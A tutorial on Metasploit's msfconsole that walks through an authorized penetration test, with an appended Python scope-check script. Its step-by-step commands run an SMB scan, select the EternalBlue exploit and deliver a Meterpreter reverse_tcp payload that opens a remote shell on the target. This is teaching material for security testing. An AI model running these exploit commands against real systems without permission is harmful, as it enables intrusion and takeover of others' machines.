A Guide to the Metasploit Framework
The Metasploit Framework is one of the most powerful and widely used tools for penetration testing and vulnerability assessment. It's a platform that contains a massive database of exploits, payloads, and auxiliary modules used by security professionals to test the security of systems in a controlled, authorized manner. This guide provides a step-by-step overview of the ethical hacking workflow using the primary command-line interface, msfconsole.
The Ethical Hacking Workflow with Metasploit
A typical penetration test follows a logical sequence of steps. Metasploit is designed to facilitate this entire process. For this guide, we'll assume we have permission to test a specific machine on our network (the "target").
Step 1: Launching and Getting Oriented
First, you launch the Metasploit console. This is your primary interface for the framework.
$ msfconsole
Once inside, you can use the `help` command to see a list of core commands. Some of the most important ones to know are:
- `search [term]`: Searches for modules (exploits, scanners, etc.).
- `use [module_name]`: Selects a module to work with.
- `show options`: Displays the settings you need to configure for the selected module.
- `set [OPTION] [value]`: Sets a specific option.
- `run` or `exploit`: Executes the selected module.
Step 2: Reconnaissance and Scanning
Before you can test a vulnerability, you need to know what services are running on the target. Metasploit has built-in scanner modules for this. For example, you could search for an SMB scanner to see whether a machine exposes an SMB (file-sharing) service and which version it reports.
msf6 > search type:auxiliary name:smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.105
msf6 auxiliary(scanner/smb/smb_version) > run
This would scan the target at `192.168.1.105` and attempt to identify the version of the SMB service, which could reveal a potential vulnerability.
Step 3: Finding and Selecting an Exploit
Let's say your scan revealed a service vulnerable to the famous "EternalBlue" exploit. You can use search to find the appropriate module.
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
Step 4: Configuring the Exploit and Payload
Once you've selected an exploit, you must configure it. You also need to choose a payload—this is the code that will run on the target machine *after* the exploit is successful. The Meterpreter payload is a powerful, all-purpose choice.
msf6 exploit(...) > show options
msf6 exploit(...) > set RHOSTS 192.168.1.105
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.1.20 # Your attacking machine's IP
msf6 exploit(...) > show options # Verify all settings are correct
Step 5: Exploitation
With everything configured, you launch the attack. If the target is vulnerable, the exploit will succeed, and the payload will be delivered.
msf6 exploit(...) > exploit
Step 6: Post-Exploitation
If successful, you will be given a "Meterpreter session." This is a remote shell on the target machine, which proves that the vulnerability is real and exploitable. From here, a security professional can perform actions (like running sysinfo to get system information) to assess the level of risk the vulnerability poses.
meterpreter > sysinfo
meterpreter > help
This entire process is how security professionals and ethical hackers identify, validate, and demonstrate security risks. By proving a vulnerability can be exploited, they provide the necessary evidence for an organization to prioritize and fix the issue before a real attacker can find it.
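Because the guide assumes explicit permission for one target, it is worth putting a scope gate around the commands above. The following Python script is an added example (not part of Metasploit or this guide): it checks every RHOSTS value against an authorized-scope file (a constructed sample is embedded inline) and only then writes the Step 2 commands as a resource script that can be replayed with `msfconsole -r`; the file name `scan.rc` is an assumption.

```python
"""Scope gate for the msfconsole workflow above (added example)."""
import ipaddress
from pathlib import Path

# Constructed sample scope file: one network or host per line, '#' starts
# a comment. In a real engagement this content comes from the written
# rules of engagement (assumption: one entry per line).
SAMPLE_SCOPE = """
# Lab segment authorized for this engagement
192.168.1.0/24
10.10.5.7
"""


def parse_scope(text):
    """Turn the scope file into a list of ip_network objects."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if line:
            # strict=False lets a bare host like 10.10.5.7 become a /32
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def in_scope(host, nets):
    """True only if host falls inside at least one authorized network."""
    addr = ipaddress.ip_address(host)
    return any(addr in net for net in nets)


def build_rc(rhosts, nets):
    """Return the resource script for the Step 2 scan, or refuse if any
    requested host is outside the authorized scope."""
    for host in rhosts:
        if not in_scope(host, nets):
            raise ValueError(f"{host} is not in the authorized scope; refusing")
    # RHOSTS accepts a space-separated list of hosts.
    commands = [
        "use auxiliary/scanner/smb/smb_version",
        f"set RHOSTS {' '.join(rhosts)}",
        "run",
    ]
    return "\n".join(commands) + "\n"


if __name__ == "__main__":
    scope = parse_scope(SAMPLE_SCOPE)
    Path("scan.rc").write_text(build_rc(["192.168.1.105"], scope))
    print("wrote scan.rc; replay with: msfconsole -q -r scan.rc")
```

The same gate can wrap the exploit step by checking the RHOSTS value before the `exploit` command is appended.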
Resources and Further Reading
- Official Metasploit Documentation - The definitive source for all Metasploit knowledge.
- Rapid7's Metasploit Cheat Sheet - A fantastic quick-reference guide for common commands.
- Metasploit Unleashed - A free, in-depth course from the creators of Kali Linux.